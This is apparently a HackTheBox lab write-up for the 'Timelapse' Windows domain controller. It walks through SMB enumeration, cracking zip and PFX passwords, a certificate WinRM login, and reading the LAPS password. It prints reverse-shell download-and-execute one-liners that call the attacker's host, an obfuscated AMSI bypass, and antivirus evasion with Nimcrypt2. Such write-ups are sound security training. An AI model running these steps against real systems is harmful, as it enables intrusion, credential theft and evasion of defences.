# Timelapse - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Timelapse was an excellent easy-rated HTB Windows machine created by [ctrlzero](https://app.hackthebox.com/users/168546)

It includes SMB guest authentication and hash cracking for user.  
Root involves finding credentials in PowerShell history and ReadLAPSPassword DACL abuse.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.089s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49696/tcp open  unknown
54343/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,54343 -oN timelapse.nmap 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.090s latency).
                                                                                                                                                                                              
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-08-19 03:34:55Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn:                                    
|_  http/1.1                                   
|_http-title: Not Found
|_ssl-date: 2023-08-19T03:36:25+00:00; +7h59m58s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
54343/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-19T03:35:49
|_  start_date: N/A
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.11.152 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=timelapse,DC=htb
ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=timelapse,DC=htb
namingContexts: CN=Configuration,DC=timelapse,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 131274
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name, CN=Sites,CN=Configuration,DC=timelapse,DC=htb
dnsHostName: dc01.timelapse.htb
defaultNamingContext: DC=timelapse,DC=htb
currentTime: 20230819034443.0Z
configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb
```

We have the FQDN `dc01.timelapse.htb` here; we can add it to `/etc/hosts`:

```text
10.10.11.152 dc01.timelapse.htb timelapse.htb
```

## SMB enumeration

We can enumerate SMB shares. [CrackMapExec](https://github.com/mpgn/CrackMapExec) is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@58558565bfef:~# echo '10.10.11.152 dc01.timelapse.htb timelapse.htb' >> /etc/hosts
```

Testing for null session:

```console
root@58558565bfef:~# cme smb 10.10.11.152 -d timelapse.htb -u '' -p '' --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\: 
SMB         10.10.11.152    445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@58558565bfef:~# cme smb 10.10.11.152 -d timelapse.htb -u 'opcode' -p '' --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\opcode: 
SMB         10.10.11.152    445    DC01             [*] Enumerated shares
SMB         10.10.11.152    445    DC01             Share           Permissions     Remark
SMB         10.10.11.152    445    DC01             -----           -----------     ------
SMB         10.10.11.152    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.152    445    DC01             C$                              Default share
SMB         10.10.11.152    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.152    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.152    445    DC01             Shares          READ            
SMB         10.10.11.152    445    DC01             SYSVOL                          Logon server share 
```

Guest sessions are enabled.  
Since we can read the `IPC$` share, we can attempt RID cycling:

```console
root@58558565bfef:~# cme smb 10.10.11.152 -d timelapse.htb -u 'opcode' -p '' --rid-brute
SMB         10.10.11.152    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\opcode: 
SMB         10.10.11.152    445    DC01             498: TIMELAPSE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             500: TIMELAPSE\Administrator (SidTypeUser)
SMB         10.10.11.152    445    DC01             501: TIMELAPSE\Guest (SidTypeUser)
SMB         10.10.11.152    445    DC01             502: TIMELAPSE\krbtgt (SidTypeUser)
SMB         10.10.11.152    445    DC01             512: TIMELAPSE\Domain Admins (SidTypeGroup)
SMB         10.10.11.152    445    DC01             513: TIMELAPSE\Domain Users (SidTypeGroup)
SMB         10.10.11.152    445    DC01             514: TIMELAPSE\Domain Guests (SidTypeGroup)
SMB         10.10.11.152    445    DC01             515: TIMELAPSE\Domain Computers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             516: TIMELAPSE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             517: TIMELAPSE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.152    445    DC01             518: TIMELAPSE\Schema Admins (SidTypeGroup)
SMB         10.10.11.152    445    DC01             519: TIMELAPSE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.152    445    DC01             520: TIMELAPSE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.152    445    DC01             521: TIMELAPSE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             522: TIMELAPSE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             525: TIMELAPSE\Protected Users (SidTypeGroup)
SMB         10.10.11.152    445    DC01             526: TIMELAPSE\Key Admins (SidTypeGroup)
SMB         10.10.11.152    445    DC01             527: TIMELAPSE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.152    445    DC01             553: TIMELAPSE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.152    445    DC01             571: TIMELAPSE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.152    445    DC01             572: TIMELAPSE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.152    445    DC01             1000: TIMELAPSE\DC01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             1101: TIMELAPSE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.152    445    DC01             1102: TIMELAPSE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.152    445    DC01             1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB         10.10.11.152    445    DC01             1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB         10.10.11.152    445    DC01             1603: TIMELAPSE\legacyy (SidTypeUser)
SMB         10.10.11.152    445    DC01             1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB         10.10.11.152    445    DC01             1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB         10.10.11.152    445    DC01             1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3101: TIMELAPSE\Development (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3102: TIMELAPSE\HelpDesk (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3103: TIMELAPSE\svc_deploy (SidTypeUser)
```

`LAPS_Readers` group is interesting.  
I tried to look for AS-REProastable accounts but didn't find any.

We can instead look at the other share: `Shares`
I prefer to use [impacket](https://github.com/fortra/impacket) to explore SMB shares:

```console
opcode@parrot$ smbclient.py timelapse.htb/opcode@dc01.timelapse.htb -no-pass
```

We can choose the "Shares" share and look inside:

```console
# use Shares
# ls
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 .
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 ..
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 Dev
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 HelpDesk
# cd HelpDesk
# ls
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 .
drw-rw-rw-          0  Mon Oct 25 11:55:14 2021 ..
-rw-rw-rw-    1118208  Mon Oct 25 11:55:14 2021 LAPS.x64.msi
-rw-rw-rw-     104422  Mon Oct 25 11:55:14 2021 LAPS_Datasheet.docx
-rw-rw-rw-     641378  Mon Oct 25 11:55:14 2021 LAPS_OperationsGuide.docx
-rw-rw-rw-      72683  Mon Oct 25 11:55:14 2021 LAPS_TechnicalSpecification.docx
# cd ../Dev
# ls
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 .
drw-rw-rw-          0  Mon Oct 25 15:40:06 2021 ..
-rw-rw-rw-       2611  Mon Oct 25 17:05:30 2021 winrm_backup.zip
```

`HelpDesk` contains files that indicate LAPS is running on this system.  
Inside `Dev`, we have a file `winrm_backup.zip`.

```console
# get winrm_backup.zip
```

## Cracking zip password

Now, we can crack this zip password.  
I don't like `john` rolling release on debian, I prefer to build the github version.

```console
opcode@parrot$ git clone https://github.com/openwall/john.git
opcode@parrot$ cd john/src
opcode@parrot$ ./configure
opcode@parrot$ sudo make clean
opcode@parrot$ sudo make -j4
```

Now we can get the hash:

```console
opcode@parrot$ ~/john/run/zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
```

And crack it:

```console
opcode@parrot$ ~/john/run/john --wordlist=/home/opcode/wordlists/rockyou.txt hash
```

It immediately cracks, and we get the password `supremelegacy`

```console
opcode@parrot$ unzip -P supremelegacy winrm_backup.zip
Archive:  winrm_backup.zip
  inflating: legacyy_dev_auth.pfx
```

## Cracking PFX password

```console
opcode@parrot$ openssl pkcs12 -in legacyy_dev_auth.pfx -info
Enter Import Password:
Can't read Password
```

Seems like this one is password-protected as well.  
We can use `pfx2john.py` to extract the hash from a PFX file.  
It has some prerequisites that we need to install:

```console
opcode@parrot$ python3 -m pip install --break-system-packages asn1crypto
```

Now we can get that hash:

```console
opcode@parrot$ python3 ~/john/run/pfx2john.py legacyy_dev_auth.pfx > hash
```

Once again, `john` can be used to crack it:

```console
opcode@parrot$ ~/john/run/john --wordlist=/home/opcode/wordlists/rockyou.txt hash
```

It takes a while and cracks to `thuglegacy`

## Authenticating WinRM with certificate

Now we can examine the file with `openssl`:

```console
opcode@parrot$ openssl pkcs12 -in legacyy_dev_auth.pfx -passin pass:thuglegacy -passout pass:thuglegacy -info
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00 
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90 
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIFLTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIZd3RQGSV9OgCAggA
MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBBgDxZHjx6WhgzAj1EpFAnIBIIE
0N3/P2AMRj3DTqTv7MZ/g0AGok2AUJpYzQaGWTSfG5YFCWN48iYGLUidqEirTtpT
i2GspE3rpiB0e+uURp4qdWBJI4NmCdMfIhsPp9LSopuBHBfe4sxn4fQFJ66q7Dwj
0Byd3m0qC6WFOcAlywMkyLaV68a7/bF2+o0NMJKmt2cfrq4FtLUpfBoFjl58yQjR
2ECaSS18ua4dRFVSn2Ho/iO+yvJtlkYlGDXZW8WObL00Mh+pDdjnf9Riq+j9437O
SeZAHkT853O9bfE4KabIrAbNPGW7k87SjoDt7d/k6fWDEevHdPF3lOFrc+XkZPem
hjjvhbxkvYgbwhxNjwD3SWyYG+4RErYUSia7Kany8Q+sxFXRU1FR9ZbEq6oAfIXv
o6+DZyDZp6fz2+o5qa+ry3Hiu709mvY1I0N7OvrNWC8IppAzzZD2rG3/TwJep7Na
tNXd7L9ck6w240zX25zVAxAODcMSZG5/Q9wrYlhCbxBlevOkXX8X9oHW0KjSc6Rf
6y1PljXEIxXMC5GMqe4R0yx4bAF3udpF1oHyd8RHbgf1zsEN55zJlRJuidS33uKt
2xWfDEob/tk/lkbl8QOfmVD4HS4D1tgP2D5X+AREvuKLTf3DlasbmN+5c/4tCOGw
+9dFJwe9If6Vsp9jFH7iYjYxOVkThw7Hfs+cQ+kQNtEY4T5lGHBTV6aT9qGWmFLs
8A5xAcajk2gf+p2tVGRsj2loqd2gHWWSptHPinR3umXlmbN54aUgpUwEktsVpNwc
vu491+NJGCFSWROQMRRqZIt/XOKFLST9yIyeJ2grvBrh9pmozpSj+R770KfXz1Up
6dLRv7NyUqURTYskwRgV78JspJJrAob0tOAxcbv/Iv5euUXbXdwyCp365ijMX/lv
zrZ24vNxEhfezcTLQW7Rq7R/RQzP/eLACOWgO+6GVaCOde31nH0iybfkFJ8Qrk1T
tM5Izl+I6F2IZI0itu/g4HHighKEpotwT5KOTof7A6iNcYdeRgNnlMdRKoFQNxLK
oQ7iipuoPLQLOwo9+SUJkyy/NuN50ougph5jf87C3N2NzYrz5i4HU3RUX+EaWW+3
R2tj9i3+nZiJxLk1e/Kn2pAKKgn6pcxhG+6nAMMzyjClCgBvpp+NWYzu572Ay3tj
wTWkTdVTvumhy49U39QZ04xwJCI58Oskhtj41Sbmx3Am4exO4a0QZHj4RvV6RXsj
OQ1XkGVBUkuSVqEGWh6M553Sq8CEddYsR8Z4mB9Fe9qQRbSUSnMgZFcJVzddRUhT
N9x8IOJh3L26j4f+JQwOdUkKBLH7VWXhvbiedUIK4ei6OB5l7r3iKLCiO79BQcz5
9l6ugat8T2OLMwWa+JIkE7ckv00A1HtkJTY+0D1D5b9Pu86Ttv5xxGVetwxJ5PXb
/n6EQBGmbeocTId48C4nNBFXTYPr37QZk0GrvD8eQrosdVWaevm7+DgWt2iNuaTz
+BObvtQ/4CnI5mMQb0849kucNRY0TRTG2eRTRBIr2zP/SLZsFDk3pCC/H4Yup+Oc
PrYmhAfAbct6+H7u1Ma1AF8cLRDWmw9l5yj7hIlorEWa0vesgvK20UmlqZ4097nt
d8gUVVFpXrgdpV5CICoi3MeJINVaSyy4JO48zmbhbjzx
-----END ENCRYPTED PRIVATE KEY-----
PKCS7 Data
Certificate bag
Bag Attributes
    localKeyID: 01 00 00 00 
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----
```

The archive containing this certificate was named `winrm_backup.zip`.  
Googling around, I learnt that WinRM supports PKINIT. Therefore, if we have a computer's PFX file, we can authenticate and get a shell.  
(<https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/>)

But the `evil-winrm` command needs a public and a private key in PEM format. It doesn't work with PFX.  
I found an [article](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file) explaining how to extract PEM private and public keys from a PFX file.

Extract the certificate:

```console
opcode@parrot$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_auth.crt
```

I used `thuglegacy` when asked for import password.  
Extract the public key:

```console
opcode@parrot$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_auth.key
```

When asked for password, I used `thuglegacy`.  
It also asks us to set a PEM passphrase; I used `opcode` because it didn't allow a blank passphrase.  
Therefore, another step is needed to get rid of this passphrase:

```console
opcode@parrot$ openssl rsa -in legacyy_auth.key -out legacyy_auth_pt.key
```

I used `opcode` when it asked for passphrase.

Finally, we can use [evil-winrm](https://github.com/Hackplayers/evil-winrm) to get a shell:

```console
opcode@parrot$ evil-winrm -i 10.10.11.152 -c legacyy_auth.crt -k legacyy_auth_pt.key -S -r timelapse.htb
```

It gets us a shell as `legacyy`.  
We can now upgrade the shell with [ConPtyShell](https://github.com/antonioCoco/ConPtyShell)

```powershell
IEX(IWR http://10.10.14.147:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.147 9001
```

The antivirus on the box blocks this script. I tried using `Invoke-Rabids.ps1`, a slightly modified `ConPtyShell` to evade signature-based detection:

```powershell
IEX(IWR http://10.10.14.147:8000/Invoke-Rabids.ps1 -UseBasicParsing); Invoke-Rabids 10.10.14.147 9001
```

It worked, and I got a shell.

## Usual enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name         SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development                       Group            S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Next, I wanted to run [adPEAS](https://github.com/61106960/adPEAS) for further enumeration:

```console
PS C:\> IEX(IWR http://10.10.14.147:8000/adPEAS.ps1 -UseBasicParsing)
```

This gets blocked by the AV too.  
We can patch AMSI for good measure:

```console
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

```console
PS C:\> IEX(IWR http://10.10.14.147:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\> Invoke-adPEAS 
```

Users `thecybergeek`, `TRX`, and `payl0ad` are Domain admins and can perform DCSync.  
It didn't find any other critical information.

The other directory in SMB share suggested LAPS.  
We had discovered a `LAPS_Readers` group by RID cycling too.

```console
PS C:\> net group LAPS_Readers
Group name     LAPS_Readers
Comment

Members

-------------------------------------------------------------------------------
svc_deploy
```

We should collect bloodhound data and mark this account as high priority.

[Bloodhound CE](https://github.com/SpecterOps/BloodHound) came out very recently.  
Sadly, it is not compatible with [BloodHound.py](https://github.com/dirkjanm/BloodHound.py) ingestor yet.  
We'd have to use [SharpHound.exe](https://github.com/BloodHoundAD/SharpHound)

```console
PS C:\Windows\Tasks> iwr 10.10.14.147:8000/SharpHound/SharpHound.exe -o SharpHound.exe
PS C:\Windows\Tasks> .\SharpHound.exe -c All
```

We can set up an SMB share locally to transfer the file back:

```console
opcode@parrot$ sudo smbserver.py -username opcode -password opcode -smb2support casket /home/opcode/CTF/windows
```

And add it on the windows box:

```console
PS C:\> net use \\10.10.14.147\casket opcode /user:opcode
The command completed successfully.
```

We can transfer the file now:

```console
PS C:\Windows\Tasks> copy \Windows\Tasks\20230820143232_BloodHound.zip \\10.10.14.147\casket\
```

After the transfer, we can destroy the share:

```console
PS C:\Windows\Tasks> net use /d \\10.10.14.147\casket
\\10.10.14.128\casket was deleted successfully.
```

To use BloodHound CE, we only need to download the `docker-compose.yml` from their repo and run `docker compose up`.

```console
opcode@parrot$ wget https://raw.githubusercontent.com/SpecterOps/BloodHound/main/examples/docker-compose/docker-compose.yml
opcode@parrot$ docker compose up
```

After that, we can visit <http://localhost:8080/ui/login> and use the username `admin` with the randomly generated password that shows up in logs.  
It asks us to change password and finally loads the Bloodhound interface.  
We can click the "gear icon" on top right, select "Administration" and upload ingestor data in "File Ingest"

Clicking on `Outbound Object Control` option for `svc_deploy`, we can get the LAPS graph:

![1](images/1.png)

I wanted to mark user `legacyy` as owned, and user `svc_deploy` as high priority, but I couldn't figure out how to do that.  
I guess "Pathfinding" is the alternative to that feature.  
I looked around and tried several cypher queries but found nothing useful.

Then, I tried [Certify](https://github.com/GhostPack/Certify)

```console
PS C:\Windows\Tasks> iwr 10.10.14.147:8000/Certify.exe -o Certify.exe
PS C:\Windows\Tasks> .\Certify.exe find /vulnerable
```

It was blocked by AV.  
We can use [Nimcrypt2](https://github.com/icyguider/Nimcrypt2) to bypass that:

```console
opcode@parrot$ ./nimcrypt -f Certify.exe -t csharp -o CertifyObf.exe -s
```

This version should go through AV:

```console
PS C:\Windows\Tasks> iwr 10.10.14.147:8000/CertifyObf.exe -o CertifyObf.exe
PS C:\Windows\Tasks> .\CertifyObf.exe find /vulnerable 
[*] Applying amsi patch: true 
[*] Applying etw patch: true 
[*] Decrypting packed exe... 

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates     
[*] Using the search base 'CN=Configuration,DC=timelapse,DC=htb' 
[!] There are no enterprise CAs and therefore no one can request certificates. Stopping...
```

I also tried [WinPEAS](https://github.com/carlospolop/PEASS-ng/)

```console
PS C:\Windows\Tasks> iwr 10.10.14.147:8000/winPEASany.exe -o winPEASany.exe
PS C:\Windows\Tasks> .\winPEASany.exe
```

This one got blocked by AV as well. Once again, we can use [Nimcrypt2](https://github.com/icyguider/Nimcrypt2):

```console
opcode@parrot$ ./nimcrypt -f winPEASany.exe -t csharp -o winpeasobf.exe -s
```

```console
PS C:\Windows\Tasks> iwr 10.10.14.147:8000/winpeasobf.exe -o winpeasobf.exe
PS C:\Windows\Tasks> .\winpeasobf.exe
```

Inside, I found this bit:

```text
+----------¦ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 3986B
```

This file is usually not helpful, but we should always take a look:

```console
PS C:\Windows\Tasks> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami 
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
cd C:\Windows\Tasks\
ls
exit
cd C:\Windows\Tasks\
```

We have the credentials for user `svc_deploy` in here.

## Reading LAPS password

We already know that `svc_deploy` belongs to `LAPS_Readers` group and can read LAPS password.  
We can try it:

```console
opcode@parrot$ ldapsearch -LLL -x -H ldap://10.10.11.152 -D 'svc_deploy' -w 'E3R$Q62^12p7PLlC%KWaxuaV' -b "dc=timelapse,dc=htb" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
dn: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: EQ0ePF];6q!,()65Xal%W4E3

# refldap://ForestDnsZones.timelapse.htb/DC=ForestDnsZones,DC=timelapse,DC=htb

